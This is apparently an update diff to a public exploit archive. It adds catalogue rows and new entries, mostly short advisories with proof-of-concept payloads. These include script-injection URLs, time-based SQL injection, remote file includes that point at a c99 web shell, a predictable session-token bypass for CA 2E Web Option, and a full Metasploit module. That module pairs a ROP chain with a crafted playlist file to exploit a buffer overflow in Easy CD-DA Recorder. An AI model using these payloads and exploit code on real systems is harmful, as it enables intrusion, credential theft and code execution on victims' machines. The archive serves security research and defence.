Updated 02_15_2014

files.csv

@@ -28423,3 +28423,19 @@ id,file,description,date,author,platform,type,port
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
 31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
+31641,platforms/java/webapps/31641.txt,"Business Objects Infoview 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0
+31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder PLS Buffer Overflow",2014-02-13,metasploit,windows,local,0
+31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 CznCustomContainer.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 home.asp CFTARGET Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31647,platforms/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",multiple,webapps,0
+31648,platforms/asp/webapps/31648.txt,"Cezanne 7 CFLookup.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31649,platforms/asp/webapps/31649.txt,"Cezanne 7 CznCommon/CznCustomContainer.asp FUNID Parameter SQL Injection",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 'CFLogon.asp' Cross-Site Scripting Vulnerability",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
+31651,platforms/php/webapps/31651.txt,"amfphp 1.2 browser/methodTable.php class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
+31652,platforms/php/webapps/31652.txt,"amfphp 1.2 browser/code.php Multiple Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
+31653,platforms/php/webapps/31653.txt,"amfphp 1.2 browser/details class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
+31654,platforms/php/webapps/31654.txt,"W2B Online Banking 'ilang' Parameter Remote File Include Vulnerability",2008-04-15,THuM4N,php,webapps,0
+31655,platforms/php/webapps/31655.txt,"Istant-Replay 'read.php' Remote File Include Vulnerability",2008-04-15,THuGM4N,php,webapps,0
+31656,platforms/windows/dos/31656.txt,"ICQ 6 'Personal Status Manager' Remote Buffer Overflow Vulnerability",2008-04-16,"Leon Juranic",windows,dos,0
+31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 'bs_auth.php' Cross Site Scripting Vulnerability",2008-04-16,ZoRLu,php,webapps,0

platforms/asp/webapps/31644.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28772/info
+
+Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Authenticated attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+Cezanne 6.5.1 and 7 are vulnerable; other versions may also be affected. 
+
+https://www.example.es/cezanneweb/CFLookUP.asp?LookUPId=>"><script>alert("S21sec")</script>&CbFun=Focus_CallBack&FUNID=7302062&CloseOnGet=yes

platforms/asp/webapps/31645.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28772/info
+ 
+Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+Authenticated attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Cezanne 6.5.1 and 7 are vulnerable; other versions may also be affected. 
+
+https://www.example.es/cezanneweb/CznCommon/CznCustomContainer.asp?ACTION=RETRIEVE&Columns=2&Title=7302053&TitleParms="></title><script>alert(&#039;%20S21Sec%20&#039;)</script>&WidgetsFunctions=7100027%2C7302015&WidgetsColumns=1%2C1&WidgetsTogglers=Y%2CY&WidgetsHeights=%2D1%2C%2D1&WidgetsLinks=&WidgetsTitles=%2D1%2C%2D1&HideNonWorkingWidgets=Y&FUNID=7302031&LINKID=%2D1

platforms/asp/webapps/31646.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28772/info
+  
+Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+Authenticated attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+  
+Cezanne 6.5.1 and 7 are vulnerable; other versions may also be affected. 
+
+https://www.example.es/cezanneweb/home.asp?CFTARGET=";}alert("S21sec")</SCRIPT>%20-->

platforms/asp/webapps/31648.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28773/info
+
+Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cezanne 7 is vulnerable; other versions may also be affected. 
+
+https://www.example.es/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0:0:20';--&InIFrame=1STRING:;waitfor%20delay%20'0:0:20';--

platforms/asp/webapps/31649.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28773/info
+ 
+Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Cezanne 7 is vulnerable; other versions may also be affected. 
+
+https://www.example.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;waitfor%20delay%20'0:0:05';--STRING:;waitfor%20delay%20'0:0:05';--

platforms/asp/webapps/31650.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/28774/info
+
+Cezanne Software is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Cezanne 6.5.1 and 7 are vulnerable; other versions may also be affected.
+
+The identified parameter is: "SleUserName"
+
+URL: https://www.somesite.es/cezanneweb/CFLogon/CFLogon.asp
+    (Use a Proprietary Account)
+
+HTTP METHOD:POST
+STRING:&#039;)"><script>alert("S21sec")</script>

platforms/java/webapps/31641.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/28762/info
+
+Business Objects is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input via the Infoview web portal.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Java versions of Business Objects XI R2; other versions may also be affected.
+
+NOTE: .Net versions are unaffected.
+
+http://www.example.com/businessobjects/enterprise115/desktoplaunch/InfoView/logon/logon.object;jsessionid=7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible=true&authenticationVisible=true&referer=&refererFormData=&isFromLogonPage=true&cms=> 
+%22%27><img%20src%3d%22javascript:alert(%27XSS%20Test%20Successful 
+%27)%22>" 

platforms/multiple/webapps/31647.txt

@@ -0,0 +1,52 @@
+Vulnerability title: Unauthenticated Privilege Escalation in CA 2E Web Option
+
+CVE: CVE-2014-1219
+Vendor: CA
+Product: 2E Web Option
+Affected version: 8.1.2
+Fixed version: N/A
+Reported by: Mike Emery
+
+Details:
+
+CA 2E Web Option (r8.1.2) and potentially others, is vulnerable to unauthenticated privilege escalation via a predictable session token.
+The POST parameter session token W2E_SSNID appears as follows:
+
+W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE
+JuNX9GoVjCEbqIuKh6kFRvbzYnUxgQtONszJldyAar3LtTSwsmBLpdlPc5iDH4Zf75
+
+
+However, this token is poorly validated, leading to
+
+W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013
+
+being accepted as a valid session. By incrementing and
+decrementing the digits at the end of the value given above, it is
+possible to control the session at the given ID. This token is sent as
+part of the login page, and as such, can be manipulated by an
+unauthenticated attacker, giving them access to any valid session.
+Consequentially, it is possible to access the following page as such:
+
+https://app.domain.co.uk/web2edoc/close.htm?SSNID=3DW90NIxGoSsN1023ZYW2E735182000026
+
+Ending the session specified, which could lead to a denial of service condition.
+
+Further details at:
+http://portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1219/
+
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights
+reserved worldwide. Permission is hereby granted for the electronic
+redistribution of this information. It is not to be edited or altered in
+any way without the express written consent of Portcullis Computer
+Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this
+information constitutes acceptance for use in an AS IS condition. There
+are NO warranties, implied or otherwise, with regard to this information
+or its use. Any use of this information is at the user's risk. In no
+event shall the author/distributor (Portcullis Computer Security
+Limited) be held liable for any damages whatsoever arising out of or in
+connection with the use or spread of this information.

platforms/php/webapps/31651.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28789/info
+
+Amfphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+
+Amfphp 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/amfphp/browser/methodTable.php?class=[xss]

platforms/php/webapps/31652.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28789/info
+ 
+Amfphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Amfphp 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/amfphp/browser/code.php?class=[xss]
+http://www.example.com/amfphp/browser/code.php?action=&codeType=&class=[xss]&location=[xss]

platforms/php/webapps/31653.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28789/info
+  
+Amfphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+Attackers may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to steal cookie-based authentication credentials and to launch other attacks.
+  
+Amfphp 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/amfphp/browser/details.php?class=[xss] 

platforms/php/webapps/31654.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28796/info
+
+W2B Online Banking is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/[path]/index.php?ilang=http://www.example2.com/c99.txt 

platforms/php/webapps/31655.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28797/info
+
+Istant-Replay is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+http://www.example.com/[forum]/read.php?data=http://127.0.0.1/c99.txt? 

platforms/php/webapps/31657.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28810/info
+
+Blogator-script is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Blogator-script 0.95 is affected; other versions may also be vulnerable.
+
+http://www.example.com/BS0.95/Blogator-script/bs_auth.php?msg=[XSS]
+
+

platforms/windows/dos/31656.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/28803/info
+
+ICQ is prone to a remote buffer-overflow vulnerability because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers.
+
+A remote attacker may execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial of service.
+
+This issue affects ICQ 6 build 6043; other versions may also be vulnerable. 
+
+------
+|<a href="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"><img
+src="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" border="0" /></a>|
+------ 

platforms/windows/local/31643.rb

@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy CD-DA Recorder PLS Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
+        By persuading the victim to open a specially-crafted .PLS file, a
+        remote attacker could execute arbitrary code on the system or cause
+        the application to crash. This module has been tested successfully on
+        Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'chap0',        # Vulnerability discovery and original exploit
+          'Gabor Seljan', # Metasploit module
+          'juan vazquez'  # Improved reliability
+        ],
+      'References'     =>
+        [
+          [ 'BID', '40631' ],
+          [ 'EDB', '13761' ],
+          [ 'OSVDB', '65256' ],
+          [ 'CVE', '2010-2343' ],
+          [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'DisableNops'    => true,
+          'BadChars'       => "\x0a\x3d",
+          'Space'          => 2454,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"  # ADD ESP,-3500
+        },
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
+            # easycdda.exe 3.0.114.0
+            # audconv.dll 7.0.815.0
+            {
+              'Offset' => 1108,
+              'Ret'    => 0x1001b19b  # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jun 7 2010',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
+        ],
+      self.class)
+
+  end
+
+  def nops
+    return make_nops(4).unpack("V").first
+  end
+
+  def rop_nops(n = 1)
+    # RETN (ROP NOP) [audconv.dll]
+    [0x1003d55d].pack('V') * n
+  end
+
+  def exploit
+
+    # ROP chain generated by mona.py - See corelan.be
+    rop_gadgets =
+    [
+      0x1007261e,  # POP EDX # RETN [audconv.dll]
+      0x0042a0e0,  # &VirtualProtect() [IAT easycdda.exe]
+      0x1003bd6b,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
+      0x10035802,  # XCHG EAX,ESI # RETN [audconv.dll]
+      0x1005d288,  # POP EBP # RETN [audconv.dll]
+      0x004030c8,  # &PUSH ESP # RET 0x08 [easycdda.exe]
+      0x1005cc2d,  # POP EBX # RETN [audconv.dll]
+      0x00000996,  # 0x00000996-> EBX
+      0x1008740c,  # POP EDX # RETN [audconv.dll]
+      0x00000040,  # 0x00000040-> EDX
+      0x1001826d,  # POP ECX # RETN [audconv.dll]
+      0x004364c6,  # &Writable location [easycdda.exe]
+      0x00404aa9,  # POP EDI # RETN [easycdda.exe]
+      0x100378e6,  # RETN (ROP NOP) [audconv.dll]
+      0x0042527d,  # POP EAX # RETN [easycdda.exe]
+      nops,
+      0x00429692   # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
+    ].flatten.pack('V*')
+
+    sploit =  rop_nops(target['Offset'] / 4)
+    sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
+    sploit << [target.ret].pack("V")
+    sploit << rop_nops(22)
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha_upper(10000) # Generate exception
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(sploit)
+
+  end
+end